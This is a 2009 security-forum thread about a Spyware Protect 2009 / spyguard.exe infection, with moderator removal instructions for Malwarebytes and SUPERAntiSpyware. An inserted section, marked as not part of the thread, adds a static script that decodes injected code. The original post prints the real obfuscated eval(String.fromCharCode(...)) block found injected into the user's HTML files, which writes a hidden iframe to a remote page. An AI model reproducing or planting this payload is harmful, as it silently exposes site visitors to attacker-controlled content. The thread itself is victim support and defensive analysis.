Spyware, Viruses, & Security forum

General discussion

Pleaseeee help!

by helpneeded09 / March 15, 2009 11:02 PM PDT

Hello,

This is very very critical, and I really need some help.

So, my computer was acting weird and when we took a look at it, we found spyguard.exe and I was getting the Spyware Protect 2009 popup. We realized that something is weird, until the next day our network got "infected" by a virus, I guess. Now here is my confusion.

The following website says that Spyware Protect is harmless:
http://www.spywarevoid.com/remove-spyware-guard-2008-spywareguard-2008-removal.html

And when I say that our network was infected, all of our HTML files had the following javascript code:

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,103,103,101,51,61,34,98,97,34,59,118,97,114,32,119,51,52,53,61,34,109,34,59,118,97,114,32,114,101,54,61,34,114,111,116,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,97,47,39,43,39,105,110,100,101,120,46,39,43,39,112,104,112,39,43,39,34,32,115,116,121,108,101,61,34,100,105,115,39,43,39,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,56,56,56,56,56,56,56))</script>

Upon deciphering it, we came to know that it is going to a website which was later taken down when reported for virus.

This code used an iframe to pull some information.

Now, here is my confusion.

Are both the events related? I read Spyware Protect is harmless, but could it have inserted the virus onto our network? Is the javascript code related to the spyguard.exe found on my machine?

Any help in this matter would be greatly appreciated.

Thanks in advance.
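
Added example (not part of the original post or of any reply): one way to triage HTML files carrying a block like the one quoted above without executing it, by decoding the character codes, folding the string concatenation as text, and reporting the hidden iframe target. The function names and the sample payload are assumptions made for illustration; the sample is constructed and points at the placeholder host example.invalid.

```javascript
// Static triage for injected eval(String.fromCharCode(...)) blocks.
// Nothing is executed: char codes are decoded and concatenations folded as text.
const INJECT_RE = /eval\(\s*String\.fromCharCode\(([\d,\s]+)\)\s*\)/g;

// Layer 1: comma-separated char codes back to script source.
function decodeCharCodes(list) {
  return list.split(',').map(n => String.fromCharCode(parseInt(n, 10))).join('');
}

// Layer 2: collect var name="literal" assignments, then fold the
// 'lit'+name+'lit' argument of document.write into one string.
function foldDocumentWrite(js) {
  const vars = new Map();
  for (const m of js.matchAll(/var\s+(\w+)\s*=\s*"([^"]*)"/g)) vars.set(m[1], m[2]);
  const call = /document\.write\(((?:'[^']*'|[^')])*)\)/.exec(js);
  if (!call) return null;
  let out = '';
  for (const t of call[1].matchAll(/'([^']*)'|(\w+)/g)) {
    if (t[1] !== undefined) out += t[1];                       // quoted literal
    else out += vars.has(t[2]) ? vars.get(t[2]) : `{${t[2]}}`; // variable, or marker if unknown
  }
  return out;
}

// Layer 3: pull the iframe target and note whether it is styled invisible.
function findHiddenIframe(markup) {
  const m = /<iframe\b[^>]*\bsrc="([^"]*)"[^>]*>/i.exec(markup);
  return m ? { src: m[1], hidden: /display\s*:\s*none/i.test(m[0]) } : null;
}

// Scan one HTML document; returns one finding per injected block.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(INJECT_RE)) {
    const js = decodeCharCodes(m[1]);
    const markup = foldDocumentWrite(js);
    findings.push({ offset: m.index, js, markup, iframe: markup ? findHiddenIframe(markup) : null });
  }
  return findings;
}

// Constructed sample, not the payload from the post; example.invalid is a placeholder host.
const SAMPLE_JS = `var h="example.";var a="if";document.write('<'+a+'rame src="http://'+h+` +
  `'invalid/x.php" style="dis'+'play:n'+'one"></if'+'rame>');`;
const SAMPLE_HTML = '<html><body>ok</body></html><script type="text/javascript">' +
  'eval(String.fromCharCode(' + Array.from(SAMPLE_JS, c => c.charCodeAt(0)).join(',') + '))</script>';

for (const f of scanHtml(SAMPLE_HTML)) {
  console.log(`offset ${f.offset}: ${f.markup}`);
  console.log(f.iframe);
}
```

The recovered src value is what to search for in proxy or DNS logs, and running the scan over every HTML file on the share shows which ones carry the injected block.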

Try this link to see if harmless
by Darrell / March 16, 2009 12:36 AM PDT
In reply to: Pleaseeee help!

It isn't even listed there - but there are other sites
by Darrell / March 16, 2009 12:43 AM PDT

There are a number of reputable anti-spyware information sites on the Net. Among the best are:

SpywareInfo.com
SpywareHammer.com
CounterExploitation
Doxdesk.com
Ben Edelman - Spyware Research
FTC Spyware Workshop Information
SpywareGuide.com
PC Pitstop - Spyware Information Center
Alliance of Security Analysis Professionals (ASAP)
CDT: Campaign Against Spyware
Aumha.org - The Parasite Fight
SpywareBeware!
Spyware, Adware, & Other Nuisances
Voice of the Public
Webhelper4U.com

I too am infected
by yuda101 / March 16, 2009 5:42 AM PDT

Spyware Protect 2009 alert got into my computer as a misleading application. I received a security alert that looked like a Windows warning that I was disconnected from a firewall. I should have known better (and actually do), but like an idiot, I connected to the firewall through that, and immediately allowed a Trojan / virus to enter my computer. I can get to my search engine home page, but cannot connect to any site without a window that "states this site may be bad for your computer". It won't let me run spybot or Superantispyware software but will let me run AVG. AVG is finding 84 files infected with Win32/Cryptor. The alert keeps popping up and I keep saying "No". I haven't downloaded and won't pay. It is a virus! SOMEONE PLEASE HELP!!

MalwareBytes Anti Malware should do the "job".....
by Marianna Schmudlach / March 16, 2009 5:46 AM PDT
In reply to: I too am infected

Spyware Protect 2009 and Spy Protect
by Carol~ Moderator / March 16, 2009 5:56 AM PDT
In reply to: Pleaseeee help!

In regard to the Spyware Protect 2009 pop up, please read:

"How to remove Spyware Protect 2009 (Uninstall Instructions)"

Download Malwarebytes' Anti-Malware from here or here.

Double-click on mbam-setup.exe to install the application.

* Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
* If an update is found, it will download and install the latest version.
* Once the program has loaded, select Perform Full Scan, then click Scan.
* The scan may take some time to finish, so please be patient.
* When the scan is complete, click OK, then Show Results to view the results.
* Make sure that everything is checked, and click Remove Selected.
* When disinfection is completed, a log will open in Notepad and you may be prompted to restart (see Extra Note below).
* The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.

Extra Note:
If MBAM encounters a file that is difficult to remove, you may be asked to reboot your computer so it can proceed with the disinfection process. Regardless if prompted to restart the computer or not, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's Teatimer), they may interfere or alert you after scanning with MBAM. Temporarily disable these programs or permit them to allow the changes.

You wrote "Is the javascript code related to the spyguard.exe found on my machine?"

The "spyguard.exe" is related to Spy Guard which is a rogue-antispyware application. This application uses deceptive and aggressive advertising in order to scare you into purchasing their products. It is also known to come bundled with malware.

"How to remove The Spy Guard (Removal Instructions)"

If Malwarebytes' Anti-Malware doesn't remove it, scroll down the above page, to where you see the instructions for how to use the SmithFraudFix.

Best of luck..
Carol

(NT) Correct: 'and Spy Protect' should read 'and Spy Guard'
by Carol~ Moderator / March 16, 2009 5:59 AM PDT

Thanks...
by helpneeded09 / March 18, 2009 2:21 AM PDT

Thank you for all your replies... Appreciate it!

So, if I understand it right, only by clicking on those popups, can a virus/Trojan enter your machine and maybe spread to your network?! I know for sure that I had not clicked on any of those Spyware alerts; could the javascript code still have entered because of this Spyguard.exe or Spyware Protect 2009?

Did you run the scan?
by Carol~ Moderator / March 18, 2009 3:09 AM PDT
In reply to: Thanks...

What were the results? You stated in your original post "the computer was acting weird and when we took a look at it, we found spyguard.exe and I was getting the Spyware Protect 2009 popup". The spyguard.exe indicates some level of infection, as does the pop up. If you haven't done so, I would again suggest scanning with Malwarebytes' Anti-Malware.

If you run into any obstacles, when trying to install it or run it, please post back and you'll get further instructions.

Carol

Reply to Did you run the scan?
by helpneeded09 / March 24, 2009 12:45 AM PDT
In reply to: Did you run the scan?

Well... That is exactly what my confusion is! Scanned the computer, found nothing except for this spyguard.exe/Spyware Protect 2009. Because of this, it was concluded that my machine had caught a virus. However, I did get all my information back as well and everything was clean. Hence,

1. If my machine would have been hit by an awful virus, then I would have lost all of my information.
2. Again, I go back to my main question. Would the javascript junk I pasted earlier be "created" and "inserted" into each of the HTML files on our network because of this spyware protect?

Thanks!

I gave up.
by yuda101 / March 18, 2009 3:14 AM PDT
In reply to: Thanks...

I gave up on Spyware Protect 2009. I never downloaded that either, but did click on a firewall security warning, which is probably the opening it wanted.
I had no luck getting rid of the spyware as my computer refused to run anything. I have been having problems with it anyway, so took it to the computer mechanic for a tuneup. He's going to wipe it clean and reload my OS and install a new battery and I'm starting all over again - from scratch. I backed all my documents and photos up on a flash drive and will just leave them there and stop cluttering up my computer with all that stuff. I had 5 years of work related projects, political activity and personal crapola on that computer. In addition, I probably had a small cat (amount of hair) stored in the CPU. Cleanup will hopefully result in a new computer experience. I am glad to have found this site tho, and thank you all for the help.

For the future..
by Carol~ Moderator / March 18, 2009 3:36 AM PDT
In reply to: I gave up.

yuda101..

Had you mentioned to Marianna, your 'computer refused to run anything', there is no question in my mind, she would have been able to help you, as she has helped others in the same predicament. Guess it's history now!

Just as an aside.. I hear you about the "small cats". While the cat knows it's a forbidden area, apparently his hair doesn't!! Sad

Enjoy your new "computing experience" and ...
Safe surfing in the future ..
Carol

For the future.
by phil66 / March 18, 2009 11:09 AM PDT
In reply to: For the future..

Look for it

(NT) I be lookin' ;-)
by Carol~ Moderator / March 18, 2009 12:30 PM PDT
In reply to: For the future.

Be Careful To Scan That Flash Drive
by tobeach / March 18, 2009 2:55 PM PDT
In reply to: I gave up.

before allowing it back onto your network! Possible you did back up while infected?

If so, there's an AV program you can install on your machine to clean the Flash drive when you attach it called: Flash_Disinfector.exe

I believe it's freeware & you can Google for it. Just a thought. Happy

Thank You for the Flash Drive info
by yuda101 / March 19, 2009 1:04 AM PDT

I REALLY appreciate that advice - never gave it a thought. When I pick up my computer, I'll ask him to check it out so I don't bring that home. I'm currently using the other computer that was networked but have not shared files or printers, etc. and disconnected this one from the Gateway when the infected PC was turned on. We're taking this one to be cleaned up as soon as the other one is up and running on the internet although it shows no signs of infection and works well, but slowly (even more cat hair likely). Plus it is 9 years old and only has 256 mgs of RAM.
Thanks again for the warning.

Spyware Protect 2009
by David-s_CNET_acct / March 31, 2009 6:09 AM PDT

We were hit by this over the weekend (3/29/9) (and we have McAfee paid subscription). We used Spyware Doctor (http://www.spyware-assistance.org/dangerous-trojans/s/Spyware-Protect-2009/Remove-Spyware-Protect-2009.php?gclid=CNbwvqyRyZkCFcdM5Qod7hDwvA ) and altho it removed the annoying continuous taskbar pop-up and the dialogue box that blocked the center of the screen, I've read somewhere that Spyware Doctor pops up an ad for itself in IE and the paid version clears fake viruses.
I have a new problem, tho. When we put the wintel laptop in sleep mode and shut the lid of the case, it gives off the ping-piing sound of the case being opened all night long. We finally, groggily, shut down the computer and unplugged the ethernet cable, but I don't know what sort of malware is still doing what sort of havoc.

Scan your computer with the following.....
by Marianna Schmudlach / March 31, 2009 6:53 AM PDT
In reply to: Spyware Protect 2009

Please download Malwarebytes Anti-Malware (v1.33) and save it to your desktop.
alternate download link 1
alternate download link 2
If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.

* Make sure you are connected to the Internet.
* Double-click on mbam-setup.exe to install the application.
* When the installation begins, follow the prompts and do not make any changes to default settings.
* When installation has finished, make sure you leave both of these checked:
  o Update Malwarebytes' Anti-Malware
  o Launch Malwarebytes' Anti-Malware
* Then click Finish.

MBAM will automatically start and you will be asked to update the program before performing a scan.

* If an update is found, the program will automatically update itself.
* Press the OK button to close that box and continue.
* If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine.

On the Scanner tab:

* Make sure the "Perform Quick Scan" option is selected.
* Then click on the Scan button.
* If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
* The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
* When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
* Click OK to close the message box and continue with the removal process.

Back at the main Scanner screen:

* Click on the Show Results button to see a list of any malware that was found.
* Make sure that everything is checked, and click Remove Selected.
* When removal is completed, a log report will open in Notepad.
* The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
* Copy and paste the contents of that report in your next reply and exit MBAM.

Notes: If MBAM encounters a file that is difficult to remove, you may be asked to reboot your computer so it can proceed with the disinfection process. Regardless if prompted to restart the computer or not, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's Teatimer), they may interfere or alert you after scanning with MBAM. Please temporarily disable such programs or permit them to allow the changes. Click this link to see a list of programs that should be disabled.



Also:

Download and scan with SUPERAntiSpyware Free for Home Users

* Double-click SUPERAntiSpyware.exe and use the default settings for installation.
* An icon will be created on your desktop. Double-click that icon to launch the program.
* If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download and unzip them from here.)
* Under "Configuration and Preferences", click the Preferences button.
* Click the Scanning Control tab.
* Under Scanner Options make sure the following are checked (leave all others unchecked):

Close browsers before scanning.
Scan for tracking cookies.
Terminate memory threats before quarantining.

* Click the "Close" button to leave the control center screen.
* Back on the main screen, under "Scan for Harmful Software" click Scan your computer.
* On the left, make sure you check C:\Fixed Drive.
* On the right, under "Complete Scan", choose Perform Complete Scan.
* Click "Next" to start the scan. Please be patient while it scans your computer.
* After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
* Make sure everything has a checkmark next to it and click "Next".
* A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
* If asked if you want to reboot, click "Yes".
